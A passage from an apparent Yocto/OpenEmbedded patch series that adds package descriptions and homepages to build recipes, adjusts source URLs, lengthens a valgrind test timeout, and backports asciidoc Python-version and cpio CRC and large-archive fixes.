6 file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \ 12 file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \
7 file://mips64.patch \ 13 file://mips64.patch \
8" 14"
diff --git a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
index ed14fe66b1..b671956cc8 100644
--- a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
+++ b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Target Communication Framework for the Eclipse IDE" 1SUMMARY = "Target Communication Framework for the Eclipse IDE"
2HOMEPAGE = "http://wiki.eclipse.org/TCF" 2HOMEPAGE = "http://wiki.eclipse.org/TCF"
3DESCRIPTION = "TCF is a vendor-neutral, lightweight, extensible network protocol mainly for communicating with embedded systems (targets)."
3BUGTRACKER = "https://bugs.eclipse.org/bugs/" 4BUGTRACKER = "https://bugs.eclipse.org/bugs/"
4 5
5LICENSE = "EPL-1.0 | EDL-1.0" 6LICENSE = "EPL-1.0 | EDL-1.0"
@@ -9,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f"
9PV = "1.7.0+git${SRCPV}" 10PV = "1.7.0+git${SRCPV}"
10 11
11UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))" 12UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
12SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \ 13SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \
13 file://fix_ranlib.patch \ 14 file://fix_ranlib.patch \
14 file://ldflags.patch \ 15 file://ldflags.patch \
15 file://tcf-agent.init \ 16 file://tcf-agent.init \
diff --git a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
index e6feb25a7e..35a91b4f09 100644
--- a/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
+++ b/meta/recipes-devtools/tcltk/tcl_8.6.10.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Tool Command Language" 1SUMMARY = "Tool Command Language"
2HOMEPAGE = "http://tcl.sourceforge.net" 2HOMEPAGE = "http://tcl.sourceforge.net"
3DESCRIPTION = "Tool Command Language, is an open-source multi-purpose C library which includes a powerful dynamic scripting language. Together they provide ideal cross-platform development environment for any programming project."
3SECTION = "devel/tcltk" 4SECTION = "devel/tcltk"
4 5
5# http://www.tcl.tk/software/tcltk/license.html 6# http://www.tcl.tk/software/tcltk/license.html
diff --git a/meta/recipes-devtools/unfs3/unfs3_git.bb b/meta/recipes-devtools/unfs3/unfs3_git.bb
index d60cee87c9..d1b3fb8f57 100644
--- a/meta/recipes-devtools/unfs3/unfs3_git.bb
+++ b/meta/recipes-devtools/unfs3/unfs3_git.bb
@@ -2,6 +2,7 @@ SUMMARY = "Userspace NFS server v3 protocol"
2DESCRIPTION = "UNFS3 is a user-space implementation of the NFSv3 server \ 2DESCRIPTION = "UNFS3 is a user-space implementation of the NFSv3 server \
3specification. It provides a daemon for the MOUNT and NFS protocols, which \ 3specification. It provides a daemon for the MOUNT and NFS protocols, which \
4are used by NFS clients for accessing files on the server." 4are used by NFS clients for accessing files on the server."
5HOMEPAGE = "https://github.com/unfs3/unfs3"
5SECTION = "console/network" 6SECTION = "console/network"
6LICENSE = "unfs3" 7LICENSE = "unfs3"
7LIC_FILES_CHKSUM = "file://LICENSE;md5=9475885294e17c0cc0067820d042792e" 8LIC_FILES_CHKSUM = "file://LICENSE;md5=9475885294e17c0cc0067820d042792e"
@@ -13,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk"
13ASNEEDED = "" 14ASNEEDED = ""
14 15
15S = "${WORKDIR}/git" 16S = "${WORKDIR}/git"
16SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \ 17SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \
17 file://unfs3_parallel_build.patch \ 18 file://unfs3_parallel_build.patch \
18 file://alternate_rpc_ports.patch \ 19 file://alternate_rpc_ports.patch \
19 file://fix_pid_race_parent_writes_child_pid.patch \ 20 file://fix_pid_race_parent_writes_child_pid.patch \
@@ -35,7 +36,7 @@ BBCLASSEXTEND = "native nativesdk"
35inherit autotools 36inherit autotools
36EXTRA_OECONF_append_class-native = " --sbindir=${bindir}" 37EXTRA_OECONF_append_class-native = " --sbindir=${bindir}"
37CFLAGS_append = " -I${STAGING_INCDIR}/tirpc" 38CFLAGS_append = " -I${STAGING_INCDIR}/tirpc"
38LDFLAGS_append = " -ltirpc" 39EXTRA_OECONF_append = " LIBS=-ltirpc"
39 40
40# Turn off these header detects else the inode search 41# Turn off these header detects else the inode search
41# will walk entire file systems and this is a real problem 42# will walk entire file systems and this is a real problem
diff --git a/meta/recipes-devtools/unifdef/unifdef_2.12.bb b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
index 22b10ba234..b42051b8b6 100644
--- a/meta/recipes-devtools/unifdef/unifdef_2.12.bb
+++ b/meta/recipes-devtools/unifdef/unifdef_2.12.bb
@@ -2,6 +2,7 @@ SUMMARY = "Selectively remove #ifdef statements from sources"
2SECTION = "devel" 2SECTION = "devel"
3LICENSE = "BSD-2-Clause" 3LICENSE = "BSD-2-Clause"
4HOMEPAGE = "http://dotat.at/prog/unifdef/" 4HOMEPAGE = "http://dotat.at/prog/unifdef/"
5DESCRIPTION = "The unifdef utility selectively processes conditional C preprocessor #if and #ifdef directives. It removes from a file both the directives and the additional text that they delimit, while otherwise leaving the file alone."
5 6
6LIC_FILES_CHKSUM = "file://COPYING;md5=3498caf346f6b77934882101749ada23 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=3498caf346f6b77934882101749ada23 \
7 file://unifdef.c;endline=32;md5=6f4ee8085d6e6ab0f7cb4390e1a9c497 \ 8 file://unifdef.c;endline=32;md5=6f4ee8085d6e6ab0f7cb4390e1a9c497 \
diff --git a/meta/recipes-devtools/vala/vala.inc b/meta/recipes-devtools/vala/vala.inc
index 703ed1aa8d..71da2ef07c 100644
--- a/meta/recipes-devtools/vala/vala.inc
+++ b/meta/recipes-devtools/vala/vala.inc
@@ -1,4 +1,5 @@
1SUMMARY = "C#-like programming language for easing GObject programming" 1SUMMARY = "C#-like programming language for easing GObject programming"
2HOMEPAGE = "http://vala-project.org"
2DESCRIPTION = "Vala is a C#-like language dedicated to ease GObject programming. \ 3DESCRIPTION = "Vala is a C#-like language dedicated to ease GObject programming. \
3Vala compiles to plain C and has no runtime environment nor penalities whatsoever." 4Vala compiles to plain C and has no runtime environment nor penalities whatsoever."
4SECTION = "devel" 5SECTION = "devel"
@@ -12,7 +13,6 @@ DEPENDS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'api-doc
12# vala-native contains a native version of vapigen, which we use instead of the target one 13# vala-native contains a native version of vapigen, which we use instead of the target one
13DEPENDS_append_class-target = " vala-native" 14DEPENDS_append_class-target = " vala-native"
14BBCLASSEXTEND = "native" 15BBCLASSEXTEND = "native"
15HOMEPAGE = "http://vala-project.org"
16LICENSE = "LGPLv2.1" 16LICENSE = "LGPLv2.1"
17LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24" 17LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
18 18
diff --git a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
index 7985308e41..0c399ef52c 100644
--- a/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
+++ b/meta/recipes-devtools/valgrind/valgrind/0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch
@@ -19,6 +19,11 @@ Upstream-Status: Pending
19Signed-off-by: Dave Lerner <dave.lerner@windriver.com> 19Signed-off-by: Dave Lerner <dave.lerner@windriver.com>
20Signed-off-by: Tudor Florea <tudor.florea@enea.com> 20Signed-off-by: Tudor Florea <tudor.florea@enea.com>
21Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> 21Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
22
23Increase time limit to 90 s.
24(double of the expected time of drd/tests/std_list on qemuarm64)
25
26Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
22--- 27---
23 tests/vg_regtest.in | 75 +++++++++++++++++++++++++++++++++++++++-------------- 28 tests/vg_regtest.in | 75 +++++++++++++++++++++++++++++++++++++++--------------
24 1 file changed, 55 insertions(+), 20 deletions(-) 29 1 file changed, 55 insertions(+), 20 deletions(-)
@@ -66,7 +71,7 @@ index a441f42..cb05b52 100755
66 # Since most of the program time is spent in system() calls, need this to 71 # Since most of the program time is spent in system() calls, need this to
67 # propagate a Ctrl-C enabling us to quit. 72 # propagate a Ctrl-C enabling us to quit.
68-sub mysystem($) 73-sub mysystem($)
69+# Enforce 30 seconds limit for the test. 74+# Enforce 90 seconds limit for the test.
70+# This resume execution of the remaining tests if valgrind hangs. 75+# This resume execution of the remaining tests if valgrind hangs.
71+sub mysystem($) 76+sub mysystem($)
72 { 77 {
@@ -76,7 +81,7 @@ index a441f42..cb05b52 100755
76+ my $exit_code=0; 81+ my $exit_code=0;
77+ eval { 82+ eval {
78+ local $SIG{'ALRM'} = sub { die "timed out\n" }; 83+ local $SIG{'ALRM'} = sub { die "timed out\n" };
79+ alarm(30); 84+ alarm(90);
80+ $exit_code = system($_[0]); 85+ $exit_code = system($_[0]);
81+ alarm (0); 86+ alarm (0);
82+ ($exit_code == 2) and die "SIGINT\n"; # 2 is SIGINT 87+ ($exit_code == 2) and die "SIGINT\n"; # 2 is SIGINT
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64 b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
index 93bfd45a4e..afa6a94825 100644
--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-aarch64
@@ -120,6 +120,7 @@ drd/tests/tc19_shadowmem
120drd/tests/tc21_pthonce 120drd/tests/tc21_pthonce
121drd/tests/tc22_exit_w_lock 121drd/tests/tc22_exit_w_lock
122drd/tests/tc23_bogus_condwait 122drd/tests/tc23_bogus_condwait
123gdbserver_tests/hginfo
123helgrind/tests/annotate_rwlock 124helgrind/tests/annotate_rwlock
124helgrind/tests/annotate_smart_pointer 125helgrind/tests/annotate_smart_pointer
125helgrind/tests/bar_bad 126helgrind/tests/bar_bad
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
index d6a85c4735..88a11ca332 100644
--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-all
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
@@ -1,2 +1,4 @@
1drd/tests/bar_bad 1drd/tests/bar_bad
2drd/tests/bar_bad_xml 2drd/tests/bar_bad_xml
3gdbserver_tests/hginfo
4memcheck/tests/linux/timerfd-syscall
diff --git a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
index e16a58fc62..67999e579a 100644
--- a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
+++ b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Valgrind memory debugger and instrumentation framework" 1SUMMARY = "Valgrind memory debugger and instrumentation framework"
2HOMEPAGE = "http://valgrind.org/" 2HOMEPAGE = "http://valgrind.org/"
3DESCRIPTION = "Valgrind is an instrumentation framework for building dynamic analysis tools. There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail."
3BUGTRACKER = "http://valgrind.org/support/bug_reports.html" 4BUGTRACKER = "http://valgrind.org/support/bug_reports.html"
4LICENSE = "GPLv2 & GPLv2+ & BSD" 5LICENSE = "GPLv2 & GPLv2+ & BSD"
5LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ 6LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
@@ -106,7 +107,7 @@ VALGRINDARCH_mipsel = "mips32"
106VALGRINDARCH_mips64el = "mips64" 107VALGRINDARCH_mips64el = "mips64"
107VALGRINDARCH_powerpc = "ppc" 108VALGRINDARCH_powerpc = "ppc"
108VALGRINDARCH_powerpc64 = "ppc64" 109VALGRINDARCH_powerpc64 = "ppc64"
109VALGRINDARCH_powerpc64el = "ppc64le" 110VALGRINDARCH_powerpc64le = "ppc64le"
110 111
111INHIBIT_PACKAGE_STRIP_FILES = "${PKGD}${libdir}/valgrind/vgpreload_memcheck-${VALGRINDARCH}-linux.so" 112INHIBIT_PACKAGE_STRIP_FILES = "${PKGD}${libdir}/valgrind/vgpreload_memcheck-${VALGRINDARCH}-linux.so"
112 113
diff --git a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
index 5ed2709e31..d988e1ffce 100644
--- a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
+++ b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
@@ -1,5 +1,6 @@
1SUMMARY = "A shell-script tool for converting XML files to various formats" 1SUMMARY = "A shell-script tool for converting XML files to various formats"
2HOMEPAGE = "https://releases.pagure.org/xmlto/" 2HOMEPAGE = "https://pagure.io/xmlto"
3DESCRIPTION = "Utility xmlto is a simple shell-script tool for converting XML files to various formats. It serves as easy to use command line frontend to make fine output without remembering many long options and searching for the syntax of the backends."
3SECTION = "docs/xmlto" 4SECTION = "docs/xmlto"
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5 6
diff --git a/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
new file mode 100644
index 0000000000..14c1cd806e
--- /dev/null
+++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
@@ -0,0 +1,42 @@
1From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz>
3Date: Fri, 30 Oct 2020 15:10:35 +0100
4Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151)
5
6Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f
7
8Slightly modified to cleanly apply to asciidoc 8.6.9:
9- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9
10- line numbers corrected to eliminate offset warnings
11
12Upstream-Status: Backport
13Signed-off-by: Steve Sakoman <steve@sakoman.com>
14
15---
16 asciidoc.py | 6 +++---
17 1 file changed, 3 insertions(+), 3 deletions(-)
18
19diff --git a/asciidoc.py b/asciidoc.py
20index f960e7d8..42868c4b 100755
21--- a/asciidoc.py
22+++ b/asciidoc.py
23@@ -30,7 +30,7 @@
24 # Used by asciidocapi.py #
25 VERSION = '8.6.10' # See CHANGELOG file for version history.
26
27-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better.
28+MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better.
29
30 # ---------------------------------------------------------------------------
31 # Program constants.
32@@ -4704,8 +4704,8 @@ def init(self, cmd):
33 directory.
34 cmd is the asciidoc command or asciidoc.py path.
35 """
36- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION):
37- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION)
38+ if sys.version_info[:2] < MIN_PYTHON_VERSION:
39+ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION)
40 sys.exit(1)
41 if not os.path.exists(cmd):
42 message.stderr('FAILED: Missing asciidoc command: %s' % cmd)
diff --git a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
index 751bf0f19f..325ff9aa15 100644
--- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
+++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
@@ -8,8 +8,9 @@ LICENSE = "GPLv2"
8LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \ 8LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \
9 file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069" 9 file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069"
10 10
11SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https \ 11SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \
12 file://auto-catalogs.patch" 12 file://auto-catalogs.patch \
13 file://detect-python-version.patch"
13SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0" 14SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0"
14PV .= "+py3-git${SRCPV}" 15PV .= "+py3-git${SRCPV}"
15 16
diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc
index 1ebb33bdcd..4e6176d2e6 100644
--- a/meta/recipes-extended/bash/bash.inc
+++ b/meta/recipes-extended/bash/bash.inc
@@ -1,5 +1,6 @@
1SUMMARY = "An sh-compatible command language interpreter" 1SUMMARY = "An sh-compatible command language interpreter"
2HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html" 2HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html"
3DESCRIPTION = "Bash is the GNU Project's Bourne Again SHell, a complete implementation of the IEEE POSIX and Open Group shell specification with interactive command line editing, job control on architectures that support it, csh-like features such as history substitution and brace expansion, and a slew of other features."
3SECTION = "base/shell" 4SECTION = "base/shell"
4 5
5DEPENDS = "ncurses bison-native virtual/libiconv" 6DEPENDS = "ncurses bison-native virtual/libiconv"
@@ -48,6 +49,11 @@ do_compile_ptest () {
48 oe_runmake buildtest 49 oe_runmake buildtest
49} 50}
50 51
52do_install_prepend () {
53 # Ensure determinism as this counter increases for each make call
54 rm -f ${B}/.build
55}
56
51do_install_append () { 57do_install_append () {
52 # Move /usr/bin/bash to /bin/bash, if need 58 # Move /usr/bin/bash to /bin/bash, if need
53 if [ "${base_bindir}" != "${bindir}" ]; then 59 if [ "${base_bindir}" != "${bindir}" ]; then
diff --git a/meta/recipes-extended/bc/bc_1.07.1.bb b/meta/recipes-extended/bc/bc_1.07.1.bb
index 4a51302492..8ed10d14c2 100644
--- a/meta/recipes-extended/bc/bc_1.07.1.bb
+++ b/meta/recipes-extended/bc/bc_1.07.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Arbitrary precision calculator language" 1SUMMARY = "Arbitrary precision calculator language"
2HOMEPAGE = "http://www.gnu.org/software/bc/bc.html" 2HOMEPAGE = "http://www.gnu.org/software/bc/bc.html"
3DESCRIPTION = "bc is an arbitrary precision numeric processing language. Syntax is similar to C, but differs in many substantial areas. It supports interactive execution of statements."
3 4
4LICENSE = "GPLv3+" 5LICENSE = "GPLv3+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \ 6LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
@@ -31,4 +32,4 @@ do_compile_prepend() {
31ALTERNATIVE_${PN} = "bc dc" 32ALTERNATIVE_${PN} = "bc dc"
32ALTERNATIVE_PRIORITY = "100" 33ALTERNATIVE_PRIORITY = "100"
33 34
34BBCLASSEXTEND = "native" 35BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am
index dcf64584d9..adc85a62b2 100644
--- a/meta/recipes-extended/bzip2/bzip2/Makefile.am
+++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am
@@ -1,6 +1,6 @@
1 1
2lib_LTLIBRARIES = libbz2.la 2lib_LTLIBRARIES = libbz2.la
3libbz2_la_LDFLAGS = -version-info 1:6:0 3libbz2_la_LDFLAGS = -version-info 1:8:0
4 4
5libbz2_la_SOURCES = blocksort.c \ 5libbz2_la_SOURCES = blocksort.c \
6 huffman.c \ 6 huffman.c \
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
new file mode 100644
index 0000000000..2dfd348d7c
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
@@ -0,0 +1,58 @@
1From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001
2From: Sergey Poznyakoff <gray@gnu.org>
3Date: Fri, 7 Apr 2023 11:23:37 +0300
4Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode.
5
6* src/copyout.c (read_for_checksum): Fix type of the file_size argument.
7Rewrite the reading loop.
8
9Original patch by Stefano Babic <sbabic@denx.de>
10
11Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d]
12Signed-off-by: Marek Vasut <marex@denx.de>
13---
14 src/copyout.c | 16 +++++++---------
15 1 file changed, 7 insertions(+), 9 deletions(-)
16
17diff --git a/src/copyout.c b/src/copyout.c
18index 8b0beb6..f1ff351 100644
19--- a/src/copyout.c
20+++ b/src/copyout.c
21@@ -34,27 +34,25 @@
22 compute and return a checksum for them. */
23
24 static uint32_t
25-read_for_checksum (int in_file_des, int file_size, char *file_name)
26+read_for_checksum (int in_file_des, off_t file_size, char *file_name)
27 {
28 uint32_t crc;
29- char buf[BUFSIZ];
30- int bytes_left;
31- int bytes_read;
32- int i;
33+ unsigned char buf[BUFSIZ];
34+ ssize_t bytes_read;
35+ ssize_t i;
36
37 crc = 0;
38
39- for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read)
40+ while (file_size > 0)
41 {
42 bytes_read = read (in_file_des, buf, BUFSIZ);
43 if (bytes_read < 0)
44 error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
45 if (bytes_read == 0)
46 break;
47- if (bytes_left < bytes_read)
48- bytes_read = bytes_left;
49- for (i = 0; i < bytes_read; ++i)
50+ for (i = 0; i < bytes_read; i++)
51 crc += buf[i] & 0xff;
52+ file_size -= bytes_read;
53 }
54 if (lseek (in_file_des, 0L, SEEK_SET))
55 error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
56--
572.39.2
58
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
new file mode 100644
index 0000000000..c212bddf7d
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
@@ -0,0 +1,312 @@
1From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001
2From: Sergey Poznyakoff <gray@gnu.org>
3Date: Fri, 28 Apr 2023 15:23:46 +0300
4Subject: [PATCH 4/4] Fix appending to archives bigger than 2G
5
6* src/extern.h (last_header_start): Change type to off_t.
7* src/global.c: Likewise.
8* src/util.c (prepare_append): Use off_t for file offsets.
9
10Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a]
11Signed-off-by: Marek Vasut <marex@denx.de>
12---
13 src/extern.h | 11 ++++-----
14 src/global.c | 2 +-
15 src/util.c | 66 ++++++++++++++++++++++++++--------------------------
16 3 files changed, 39 insertions(+), 40 deletions(-)
17
18diff --git a/src/extern.h b/src/extern.h
19index 11ac6bf..12f14a9 100644
20--- a/src/extern.h
21+++ b/src/extern.h
22@@ -67,7 +67,7 @@ extern int ignore_devno_option;
23
24 extern bool to_stdout_option;
25
26-extern int last_header_start;
27+extern off_t last_header_start;
28 extern int copy_matching_files;
29 extern int numeric_uid;
30 extern char *pattern_file_name;
31@@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname,
32
33 /* copypass.c */
34 void process_copy_pass (void);
35-int link_to_maj_min_ino (char *file_name, int st_dev_maj,
36+int link_to_maj_min_ino (char *file_name, int st_dev_maj,
37 int st_dev_min, ino_t st_ino);
38 int link_to_name (char const *link_name, char const *link_target);
39
40@@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes);
41 void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename);
42 void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename);
43 void warn_if_file_changed (char *file_name, off_t old_file_size,
44- time_t old_file_mtime);
45+ time_t old_file_mtime);
46 void create_all_directories (char const *name);
47 void prepare_append (int out_file_des);
48 char *find_inode_file (ino_t node_num,
49@@ -185,7 +185,7 @@ void set_new_media_message (char *message);
50 #ifdef HPUX_CDF
51 char *add_cdf_double_slashes (char *filename);
52 #endif
53-void write_nuls_to_file (off_t num_bytes, int out_des,
54+void write_nuls_to_file (off_t num_bytes, int out_des,
55 void (*writer) (char *in_buf,
56 int out_des, off_t num_bytes));
57 #define DISK_IO_BLOCK_SIZE 512
58@@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st,
59 mode_t invert_permissions);
60 int repair_delayed_set_stat (struct cpio_file_stat *file_hdr);
61 void apply_delayed_set_stat (void);
62-
63-int arf_stores_inode_p (enum archive_format arf);
64
65+int arf_stores_inode_p (enum archive_format arf);
66diff --git a/src/global.c b/src/global.c
67index fb3abe9..5c9fc05 100644
68--- a/src/global.c
69+++ b/src/global.c
70@@ -114,7 +114,7 @@ int debug_flag = false;
71
72 /* File position of last header read. Only used during -A to determine
73 where the old TRAILER!!! record started. */
74-int last_header_start = 0;
75+off_t last_header_start = 0;
76
77 /* With -i; if true, copy only files that match any of the given patterns;
78 if false, copy only files that do not match any of the patterns. (-f) */
79diff --git a/src/util.c b/src/util.c
80index 4421b20..3be89a4 100644
81--- a/src/util.c
82+++ b/src/util.c
83@@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des)
84 static long output_bytes_before_lseek = 0;
85
86 /* Some tape drivers seem to have a signed internal seek pointer and
87- they lose if it overflows and becomes negative (e.g. when writing
88- tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
89+ they lose if it overflows and becomes negative (e.g. when writing
90+ tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
91 seek pointer and prevent it from overflowing. */
92 if (output_is_special
93 && ( (output_bytes_before_lseek += output_size) >= 1073741824L) )
94@@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush);
95 descriptor OUT_DES and reset `output_size' and `out_buff'.
96 If `swapping_halfwords' or `swapping_bytes' is set,
97 do the appropriate swapping first. Our callers have
98- to make sure to only set these flags if `output_size'
99+ to make sure to only set these flags if `output_size'
100 is appropriate (a multiple of 4 for `swapping_halfwords',
101 2 for `swapping_bytes'). The fact that DISK_IO_BLOCK_SIZE
102 must always be a multiple of 4 helps us (and our callers)
103@@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes)
104 {
105 #ifdef BROKEN_LONG_TAPE_DRIVER
106 /* Some tape drivers seem to have a signed internal seek pointer and
107- they lose if it overflows and becomes negative (e.g. when writing
108- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
109+ they lose if it overflows and becomes negative (e.g. when writing
110+ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
111 seek pointer and prevent it from overflowing. */
112 if (input_is_special
113 && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
114@@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes)
115
116 #ifdef BROKEN_LONG_TAPE_DRIVER
117 /* Some tape drivers seem to have a signed internal seek pointer and
118- they lose if it overflows and becomes negative (e.g. when writing
119- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
120+ they lose if it overflows and becomes negative (e.g. when writing
121+ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
122 seek pointer and prevent it from overflowing. */
123 if (input_is_special
124 && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
125@@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes)
126
127 if (crc_i_flag && only_verify_crc_flag)
128 {
129- int k;
130+ int k;
131 for (k = 0; k < space_left; ++k)
132 crc += in_buff[k] & 0xff;
133 }
134@@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes)
135 }
136
137 void
138-write_nuls_to_file (off_t num_bytes, int out_des,
139- void (*writer) (char *in_buf, int out_des, off_t num_bytes))
140+write_nuls_to_file (off_t num_bytes, int out_des,
141+ void (*writer) (char *in_buf, int out_des, off_t num_bytes))
142 {
143 off_t blocks;
144 off_t extra_bytes;
145 off_t i;
146 static char zeros_512[512];
147-
148+
149 blocks = num_bytes / sizeof zeros_512;
150 extra_bytes = num_bytes % sizeof zeros_512;
151 for (i = 0; i < blocks; ++i)
152@@ -603,7 +603,7 @@ create_all_directories (char const *name)
153 char *dir;
154
155 dir = dir_name (name);
156-
157+
158 if (dir == NULL)
159 error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted"));
160
